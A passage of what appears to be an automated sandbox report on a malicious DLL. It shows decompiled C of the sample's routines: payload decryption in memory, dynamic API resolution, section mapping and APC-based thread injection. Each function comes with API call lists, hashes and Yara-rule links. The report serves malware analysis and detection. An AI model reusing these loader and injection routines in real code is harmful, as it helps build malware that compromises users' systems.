				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}







                                0x6dd41ed9
                                0x6dd41edf
                                0x6dd41eed
                                0x6dd41ef4
                                0x6dd41ef9
                                0x6dd41eff
                                0x00000000
                                0x6dd41f00
                                0x00000000

                                APIs
                                • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,6DD41C0E,00000002,00000000,?,?,00000000,?,?,6DD41C0E,00000000), ref: 6DD41EF4
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: SectionView
                                • String ID:
                                • API String ID: 1323581903-0
                                • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction ID: 998123a71217bacfc5a48f5d9476e40d63ec7698643626af5cb8a02081897329
                                • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                • Instruction Fuzzy Hash: 5BF030B690420CFFEB119FA9CC85C9FBBBDEB44394B108939F652E1090D6309E188B60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41C7D, Relevance: 15.1, APIs: 10, Instructions: 103threadsleepsynchronizationCOMMON
                                Download Yara Rule
                                C-Code - Quality: 80%
                                			E6DD41C7D(intOrPtr _a4) {
				char _v28;
				struct _SYSTEMTIME _v44;
				char _v48;
				long _v52;
				long _v56;
				void* __edi;
				long _t21;
				int _t23;
				long _t26;
				long _t27;
				long _t31;
				void* _t37;
				intOrPtr _t39;
				intOrPtr _t44;
				signed int _t45;
				void* _t50;
				signed int _t54;
				void* _t56;
				intOrPtr* _t57;

				_t21 = E6DD41F10();
				_v52 = _t21;
				if(_t21 != 0) {
					L18:
					return _t21;
				} else {
					goto L1;
				}
				do {
					L1:
					GetSystemTime( &_v44);
					_t23 = SwitchToThread();
					asm("cdq");
					_t45 = 9;
					_t54 = _t23 + (_v44.wMilliseconds & 0x0000ffff) % _t45;
					_t26 = E6DD418AD(0, _t54); // executed
					_v56 = _t26;
					Sleep(_t54 << 5); // executed
					_t21 = _v56;
				} while (_t21 == 0xc);
				if(_t21 != 0) {
					goto L18;
				}
				_t27 = E6DD41ADB(_t45); // executed
				_v52 = _t27;
				if(_t27 != 0) {
					L16:
					_t21 = _v52;
					if(_t21 == 0xffffffff) {
						_t21 = GetLastError();
					}
					goto L18;
				}
				if(_a4 != 0) {
					L11:
					_push(0);
					_t56 = E6DD413D1(E6DD414E8,  &_v28);
					if(_t56 == 0) {
						_v56 = GetLastError();
					} else {
						_t31 = WaitForSingleObject(_t56, 0xffffffff);
						_v56 = _t31;
						if(_t31 == 0) {
							GetExitCodeThread(_t56,  &_v56);
						}
						CloseHandle(_t56);
					}
					goto L16;
				}
				if(E6DD4134F(_t45,  &_v48) != 0) {
					 *0x6dd441b8 = 0;
					goto L11;
				}
				_t44 = _v48;
				_t57 = __imp__GetLongPathNameW;
				_t37 =  *_t57(_t44, 0, 0); // executed
				_t50 = _t37;
				if(_t50 == 0) {
					L9:
					 *0x6dd441b8 = _t44;
					goto L11;
				}
				_t15 = _t50 + 2; // 0x2
				_t39 = E6DD41B58(_t50 + _t15);
				 *0x6dd441b8 = _t39;
				if(_t39 == 0) {
					goto L9;
				} else {
					 *_t57(_t44, _t39, _t50); // executed
					E6DD4142F(_t44);
					goto L11;
				}
			}






















                                0x6dd41c89
                                0x6dd41c92
                                0x6dd41c96
                                0x6dd41d9e
                                0x6dd41da4
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd41c9c
                                0x6dd41c9c
                                0x6dd41ca1
                                0x6dd41ca7
                                0x6dd41cb6
                                0x6dd41cb7
                                0x6dd41cba
                                0x6dd41cbd
                                0x6dd41cc6
                                0x6dd41cca
                                0x6dd41cd0
                                0x6dd41cd4
                                0x6dd41cdb
                                0x00000000
                                0x00000000
                                0x6dd41ce1
                                0x6dd41ce8
                                0x6dd41cec
                                0x6dd41d8f
                                0x6dd41d8f
                                0x6dd41d96
                                0x6dd41d98
                                0x6dd41d98
                                0x00000000
                                0x6dd41d96
                                0x6dd41cf5
                                0x6dd41d48
                                0x6dd41d48
                                0x6dd41d59
                                0x6dd41d5d
                                0x6dd41d8b
                                0x6dd41d5f
                                0x6dd41d62
                                0x6dd41d6a
                                0x6dd41d6e
                                0x6dd41d76
                                0x6dd41d76
                                0x6dd41d7d
                                0x6dd41d7d
                                0x00000000
                                0x6dd41d5d
                                0x6dd41d03
                                0x6dd41d42
                                0x00000000
                                0x6dd41d42
                                0x6dd41d05
                                0x6dd41d09
                                0x6dd41d12
                                0x6dd41d14
                                0x6dd41d18
                                0x6dd41d3a
                                0x6dd41d3a
                                0x00000000
                                0x6dd41d3a
                                0x6dd41d1a
                                0x6dd41d1f
                                0x6dd41d26
                                0x6dd41d2b
                                0x00000000
                                0x6dd41d2d
                                0x6dd41d30
                                0x6dd41d33
                                0x00000000
                                0x6dd41d33

                                APIs
                                  • Part of subcall function 6DD41F10: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6DD41C8E,751463F0,00000000), ref: 6DD41F1F
                                  • Part of subcall function 6DD41F10: GetVersion.KERNEL32 ref: 6DD41F2E
                                  • Part of subcall function 6DD41F10: GetCurrentProcessId.KERNEL32 ref: 6DD41F3D
                                  • Part of subcall function 6DD41F10: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6DD41F56
                                • GetSystemTime.KERNEL32(?,751463F0,00000000), ref: 6DD41CA1
                                • SwitchToThread.KERNEL32 ref: 6DD41CA7
                                  • Part of subcall function 6DD418AD: VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6DD41903
                                  • Part of subcall function 6DD418AD: memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6DD419C9
                                • Sleep.KERNELBASE(00000000,00000000), ref: 6DD41CCA
                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6DD41D12
                                • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 6DD41D30
                                • WaitForSingleObject.KERNEL32(00000000,000000FF,6DD414E8,?,00000000), ref: 6DD41D62
                                • GetExitCodeThread.KERNEL32(00000000,?), ref: 6DD41D76
                                • CloseHandle.KERNEL32(00000000), ref: 6DD41D7D
                                • GetLastError.KERNEL32(6DD414E8,?,00000000), ref: 6DD41D85
                                • GetLastError.KERNEL32 ref: 6DD41D98
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: ErrorLastLongNamePathProcessThread$AllocCloseCodeCreateCurrentEventExitHandleObjectOpenSingleSleepSwitchSystemTimeVersionVirtualWaitmemcpy
                                • String ID:
                                • API String ID: 1962885430-0
                                • Opcode ID: 5d31ad4d692153109710735626727ddff22d293ba22feb269be29fb9d2e9c70c
                                • Instruction ID: e4c1a832c5a590f1d97021c6a589e11912135fe43417cf3821e05724bd7292d1
                                • Opcode Fuzzy Hash: 5d31ad4d692153109710735626727ddff22d293ba22feb269be29fb9d2e9c70c
                                • Instruction Fuzzy Hash: C331A1B1988752ABD710FF698C48A6F77FCAF86354F008A2AF964D2140EB30C45487B2
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41060, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E6DD41060(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6DD41B58(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6dd441d0 + 0x6dd45014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd450e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6DD4142F(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd450f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd45104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd45119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6dd441d0 + 0x6dd4512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6DD41B9C(_t56, _a12); // executed
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}












                                0x6dd4106e
                                0x6dd41072
                                0x6dd41133
                                0x6dd41078
                                0x6dd41090
                                0x6dd4109f
                                0x6dd410a6
                                0x6dd410aa
                                0x6dd410ad
                                0x6dd4112b
                                0x6dd4112c
                                0x6dd410af
                                0x6dd410bc
                                0x6dd410c0
                                0x6dd410c3
                                0x00000000
                                0x6dd410c5
                                0x6dd410d2
                                0x6dd410d6
                                0x6dd410d9
                                0x00000000
                                0x6dd410db
                                0x6dd410e8
                                0x6dd410ec
                                0x6dd410ef
                                0x00000000
                                0x6dd410f1
                                0x6dd410fe
                                0x6dd41102
                                0x6dd41105
                                0x00000000
                                0x6dd41107
                                0x6dd4110d
                                0x6dd41113
                                0x6dd41118
                                0x6dd4111f
                                0x6dd41122
                                0x00000000
                                0x6dd41124
                                0x6dd41127
                                0x6dd41127
                                0x6dd41122
                                0x6dd41105
                                0x6dd410ef
                                0x6dd410d9
                                0x6dd410c3
                                0x6dd410ad
                                0x6dd41141

                                APIs
                                  • Part of subcall function 6DD41B58: HeapAlloc.KERNEL32(00000000,?,6DD41702,?,00000000,00000000,?,?,?,6DD41CE6), ref: 6DD41B64
                                • GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6DD41480,?,?,?,?,00000002,00000000,?,?), ref: 6DD41084
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410A6
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410BC
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410D2
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410E8
                                • GetProcAddress.KERNEL32(00000000,?), ref: 6DD410FE
                                  • Part of subcall function 6DD41B9C: NtCreateSection.NTDLL(00000002,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 6DD41BF9
                                  • Part of subcall function 6DD41B9C: memset.NTDLL ref: 6DD41C1B
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                                • String ID:
                                • API String ID: 1632424568-0
                                • Opcode ID: 8bf1687a242c7400f86c7bc04f556055f2f0a9ab0d81bb75b9811f340f8c1a1c
                                • Instruction ID: ff027949f7203d29674ba93cbe0d384c292c9be3eabca9ca5c955b21aa02bcf5
                                • Opcode Fuzzy Hash: 8bf1687a242c7400f86c7bc04f556055f2f0a9ab0d81bb75b9811f340f8c1a1c
                                • Instruction Fuzzy Hash: 3D212BF190060EDFEB10FF69E880E6A77F8EB09744B018525F945D7205E770E9528BA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD41DAE, Relevance: 9.1, APIs: 6, Instructions: 71memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 86%
                                			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
				long _v8;
				void* __edi;
				void* __esi;
				void* __ebp;
				char _t9;
				void* _t10;
				void* _t18;
				void* _t23;
				void* _t36;

				_push(__ecx);
				_t9 = _a8;
				_v8 = 1;
				if(_t9 == 0) {
					_t10 = InterlockedDecrement(0x6dd44188);
					__eflags = _t10;
					if(_t10 == 0) {
						__eflags =  *0x6dd4418c;
						if( *0x6dd4418c != 0) {
							_t36 = 0x2328;
							while(1) {
								SleepEx(0x64, 1);
								__eflags =  *0x6dd44198;
								if( *0x6dd44198 == 0) {
									break;
								}
								_t36 = _t36 - 0x64;
								__eflags = _t36;
								if(_t36 > 0) {
									continue;
								}
								break;
							}
							CloseHandle( *0x6dd4418c);
						}
						HeapDestroy( *0x6dd44190);
					}
				} else {
					if(_t9 == 1 && InterlockedIncrement(0x6dd44188) == 1) {
						_t18 = HeapCreate(0, 0x400000, 0); // executed
						_t41 = _t18;
						 *0x6dd44190 = _t18;
						if(_t18 == 0) {
							L6:
							_v8 = 0;
						} else {
							 *0x6dd441b0 = _a4;
							asm("lock xadd [eax], edi");
							_push( &_a8);
							_t23 = E6DD413D1(E6DD420CE, E6DD4121C(_a12, 1, 0x6dd44198, _t41));
							 *0x6dd4418c = _t23;
							if(_t23 == 0) {
								asm("lock xadd [esi], eax");
								goto L6;
							}
						}
					}
				}
				return _v8;
			}












                                0x6dd41db1
                                0x6dd41dbd
                                0x6dd41dbf
                                0x6dd41dc2
                                0x6dd41e38
                                0x6dd41e3e
                                0x6dd41e40
                                0x6dd41e42
                                0x6dd41e48
                                0x6dd41e4a
                                0x6dd41e4f
                                0x6dd41e52
                                0x6dd41e5d
                                0x6dd41e5f
                                0x00000000
                                0x00000000
                                0x6dd41e61
                                0x6dd41e64
                                0x6dd41e66
                                0x00000000
                                0x00000000
                                0x00000000
                                0x6dd41e66
                                0x6dd41e6e
                                0x6dd41e6e
                                0x6dd41e7a
                                0x6dd41e7a
                                0x6dd41dc4
                                0x6dd41dc5
                                0x6dd41de5
                                0x6dd41deb
                                0x6dd41ded
                                0x6dd41df2
                                0x6dd41e2e
                                0x6dd41e2e
                                0x6dd41df4
                                0x6dd41dfc
                                0x6dd41e03
                                0x6dd41e0d
                                0x6dd41e19
                                0x6dd41e20
                                0x6dd41e25
                                0x6dd41e2a
                                0x00000000
                                0x6dd41e2a
                                0x6dd41e25
                                0x6dd41df2
                                0x6dd41dc5
                                0x6dd41e87

                                APIs
                                • InterlockedIncrement.KERNEL32(6DD44188), ref: 6DD41DD0
                                • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 6DD41DE5
                                  • Part of subcall function 6DD413D1: CreateThread.KERNELBASE ref: 6DD413E8
                                  • Part of subcall function 6DD413D1: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DD413FD
                                  • Part of subcall function 6DD413D1: GetLastError.KERNEL32(00000000), ref: 6DD41408
                                  • Part of subcall function 6DD413D1: TerminateThread.KERNEL32(00000000,00000000), ref: 6DD41412
                                  • Part of subcall function 6DD413D1: CloseHandle.KERNEL32(00000000), ref: 6DD41419
                                  • Part of subcall function 6DD413D1: SetLastError.KERNEL32(00000000), ref: 6DD41422
                                • InterlockedDecrement.KERNEL32(6DD44188), ref: 6DD41E38
                                • SleepEx.KERNEL32(00000064,00000001), ref: 6DD41E52
                                • CloseHandle.KERNEL32 ref: 6DD41E6E
                                • HeapDestroy.KERNEL32 ref: 6DD41E7A
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                                • String ID:
                                • API String ID: 2110400756-0
                                • Opcode ID: c289817f76375576268b0fcc0a811d79031baa0a721befa88efec89cb1c7e1ef
                                • Instruction ID: a552b3105c71d682f5ec366594bb8c52deb7f3ee05b1766b45df1c44d78f428c
                                • Opcode Fuzzy Hash: c289817f76375576268b0fcc0a811d79031baa0a721befa88efec89cb1c7e1ef
                                • Instruction Fuzzy Hash: 7C219035640206EBEB00BFEDCC84B2A7BB9F75A7A4B108239F555E3141D7709994CB60
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD413D1, Relevance: 9.0, APIs: 6, Instructions: 32threadinjectionCOMMON
                                Download Yara Rule
                                C-Code - Quality: 100%
                                			E6DD413D1(long _a4, DWORD* _a12) {
				_Unknown_base(*)()* _v0;
				void* _t4;
				long _t6;
				long _t11;
				void* _t13;

				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x6dd441cc, 0, _a12); // executed
				_t13 = _t4;
				if(_t13 != 0) {
					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
					if(_t6 == 0) {
						_t11 = GetLastError();
						TerminateThread(_t13, _t11);
						CloseHandle(_t13);
						_t13 = 0;
						SetLastError(_t11);
					}
				}
				return _t13;
			}








                                0x6dd413e8
                                0x6dd413ee
                                0x6dd413f2
                                0x6dd413fd
                                0x6dd41405
                                0x6dd4140e
                                0x6dd41412
                                0x6dd41419
                                0x6dd41420
                                0x6dd41422
                                0x6dd41428
                                0x6dd41405
                                0x6dd4142c

                                APIs
                                • CreateThread.KERNELBASE ref: 6DD413E8
                                • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 6DD413FD
                                • GetLastError.KERNEL32(00000000), ref: 6DD41408
                                • TerminateThread.KERNEL32(00000000,00000000), ref: 6DD41412
                                • CloseHandle.KERNEL32(00000000), ref: 6DD41419
                                • SetLastError.KERNEL32(00000000), ref: 6DD41422
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                                • String ID:
                                • API String ID: 3832013932-0
                                • Opcode ID: 439b20c83ffb46f6ffdd4d5226224a8a37d7dc6c06b0f8611e35f12e4ccde602
                                • Instruction ID: 7a954158e222fbe67971443d83b354fca086e74ba38fd77c206156a70f3c7431
                                • Opcode Fuzzy Hash: 439b20c83ffb46f6ffdd4d5226224a8a37d7dc6c06b0f8611e35f12e4ccde602
                                • Instruction Fuzzy Hash: 9BF01C362C5621BBEB227FE89C0CF5BBB79FF0A751F008604F60991150C72188909BA1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8B580, Relevance: 8.0, APIs: 2, Strings: 2, Instructions: 957COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentDirectoryA.KERNEL32(000008DA,6DDCDBC8), ref: 6DD8B691
                                • GetTempPathA.KERNEL32(000008DA,6DDCDBC8), ref: 6DD8BED8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: CurrentDirectoryPathTemp
                                • String ID: $$C:\Users\user\AppData\Local\Temp\
                                • API String ID: 783798388-2545117055
                                • Opcode ID: 34ae90d8b1092dda65b6bb7e79c066e4f8154d147e40e63722fd511b8abd84c0
                                • Instruction ID: f7207cc70d449cf308cbf3bce1faa1f84dc277d83e14723814cf0eea65db916c
                                • Opcode Fuzzy Hash: 34ae90d8b1092dda65b6bb7e79c066e4f8154d147e40e63722fd511b8abd84c0
                                • Instruction Fuzzy Hash: 2482767150A3528FD705EF29C49026ABBF9BF9A314F1A4A2EF49487382E734D509CB52
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD8DE91, Relevance: 7.6, APIs: 5, Instructions: 87COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.493576751.000000006DD4E000.00000020.00020000.sdmp, Offset: 6DD4E000, based on PE: false
                                Similarity
                                • API ID: dllmain_raw$dllmain_crt_dispatch
                                • String ID:
                                • API String ID: 3136044242-0
                                • Opcode ID: 6a3cf5487002d1f8c5976509f9bef55b534309e919a90147d62066d4e10cc025
                                • Instruction ID: 620844fcf2cf81d6ce02561c5793b3222dbba721aa15adb0195aaba4b75ee9a7
                                • Opcode Fuzzy Hash: 6a3cf5487002d1f8c5976509f9bef55b534309e919a90147d62066d4e10cc025
                                • Instruction Fuzzy Hash: 84217E71D446A6EFCB136F59C840E7F3A78EBC5A94F124116F81456292E3308D059BE0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD418AD, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 111memoryCOMMON
                                Download Yara Rule
                                C-Code - Quality: 90%
                                			E6DD418AD(void* __edi, intOrPtr _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v16;
				unsigned int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				void* _v36;
				signed int _v40;
				signed char _v44;
				void* _v48;
				signed int _v56;
				signed int _v60;
				intOrPtr _t50;
				void* _t57;
				void* _t61;
				signed int _t67;
				signed char _t69;
				signed char _t70;
				void* _t76;
				intOrPtr _t77;
				unsigned int _t82;
				intOrPtr _t86;
				intOrPtr* _t89;
				intOrPtr _t90;
				void* _t91;
				signed int _t93;

				_t90 =  *0x6dd441b0;
				_t50 = E6DD41000(_t90,  &_v28,  &_v20);
				_v24 = _t50;
				if(_t50 == 0) {
					asm("sbb ebx, ebx");
					_t67 =  ~( ~(_v20 & 0x00000fff)) + (_v20 >> 0xc);
					_t91 = _t90 + _v28;
					_v48 = _t91;
					_t57 = VirtualAlloc(0, _t67 << 0xc, 0x3000, 4); // executed
					_t76 = _t57;
					_v36 = _t76;
					if(_t76 == 0) {
						_v24 = 8;
					} else {
						_t69 = 0;
						if(_t67 <= 0) {
							_t77 =  *0x6dd441cc;
						} else {
							_t86 = _a4;
							_v8 = _t91;
							_v8 = _v8 - _t76;
							_t14 = _t86 + 0x6dd45137; // 0x3220a9c2
							_t61 = _t57 - _t91 + _t14;
							_v16 = _t76;
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t70 = _t69 + 1;
								_v44 = _t70;
								_t82 = (_v60 ^ _v56) + _v28 + _a4 >> _t70;
								if(_t82 != 0) {
									_v32 = _v32 & 0x00000000;
									_t89 = _v16;
									_v12 = 0x400;
									do {
										_t93 =  *((intOrPtr*)(_v8 + _t89));
										_v40 = _t93;
										if(_t93 == 0) {
											_v12 = 1;
										} else {
											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6dd441cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}






























                                0x6dd418b4
                                0x6dd418c4
                                0x6dd418cb
                                0x6dd418ce
                                0x6dd418e3
                                0x6dd418ea
                                0x6dd418ef
                                0x6dd41900
                                0x6dd41903
                                0x6dd41909
                                0x6dd4190d
                                0x6dd41910
                                0x6dd419ec
                                0x6dd41916
                                0x6dd41916
                                0x6dd4191a
                                0x6dd419b2
                                0x6dd41920
                                0x6dd41921
                                0x6dd41926
                                0x6dd41929
                                0x6dd4192c
                                0x6dd4192c
                                0x6dd41933
                                0x6dd41936
                                0x6dd4193e
                                0x6dd4193f
                                0x6dd41940
                                0x6dd41947
                                0x6dd4194b
                                0x6dd41951
                                0x6dd41955
                                0x6dd41957
                                0x6dd4195b
                                0x6dd4195e
                                0x6dd41965
                                0x6dd41968
                                0x6dd4196d
                                0x6dd41970
                                0x6dd41986
                                0x6dd41972
                                0x6dd4197c
                                0x6dd4197e
                                0x6dd41981
                                0x6dd41981
                                0x6dd4198d
                                0x6dd4198d
                                0x6dd4198d
                                0x6dd41965
                                0x6dd41998
                                0x6dd4199b
                                0x6dd4199e
                                0x6dd419a7
                                0x6dd419a7
                                0x6dd419af
                                0x6dd419be
                                0x6dd419d3
                                0x6dd419c0
                                0x6dd419c9
                                0x6dd419ce
                                0x6dd419e4
                                0x6dd419e4
                                0x6dd419f3
                                0x6dd419f9

                                APIs
                                • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6DD41903
                                • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6DD419C9
                                • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6DD419E4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: Virtual$AllocFreememcpy
                                • String ID: Jun 6 2021
                                • API String ID: 4010158826-1013970402
                                • Opcode ID: bac12ea9750916fe97ec230f5779c9fe0ac5469e8c20e8a8408b648804219bec
                                • Instruction ID: 3e52f038066ad16465e05d56d580ce2adce783f4a0f4d24b5ae3328639be08f4
                                • Opcode Fuzzy Hash: bac12ea9750916fe97ec230f5779c9fe0ac5469e8c20e8a8408b648804219bec
                                • Instruction Fuzzy Hash: 34416871E4020AABEB04EF99C880AEEBBB5BF49310F14C129E9147B244D775AA55CF90
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 6DD420CE, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                Download Yara Rule
                                C-Code - Quality: 87%
                                			E6DD420CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6DD41C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                0x6dd420d7
                                0x6dd420dc
                                0x6dd420ea
                                0x6dd420ef
                                0x6dd420ef
                                0x6dd420f5
                                0x6dd420fa
                                0x6dd420fe
                                0x6dd42102
                                0x6dd42102
                                0x6dd4210c
                                0x6dd42115

                                APIs
                                • GetCurrentThread.KERNEL32 ref: 6DD420D1
                                • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6DD420DC
                                • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6DD420EF
                                • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6DD42102
                                Memory Dump Source
                                • Source File: 00000000.00000002.493423854.000000006DD41000.00000020.00020000.sdmp, Offset: 6DD40000, based on PE: true
                                • Associated: 00000000.00000002.493389556.000000006DD40000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493445693.000000006DD43000.00000002.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493458552.000000006DD45000.00000004.00020000.sdmp Download File
                                • Associated: 00000000.00000002.493511688.000000006DD46000.00000002.00020000.sdmp Download File
                                Similarity
                                • API ID: Thread$Priority$AffinityCurrentMask
                                • String ID:
                                • API String ID: 1452675757-0
                                • Opcode ID: 869d7e88620df4a20aacd3864a2766800083b3dfd29d9961fd91121b05031e0b
                                • Instruction ID: dc1e01dc70b2a25cdaef4612b04c75acc77b2c88e112526cee7a2d239c491284
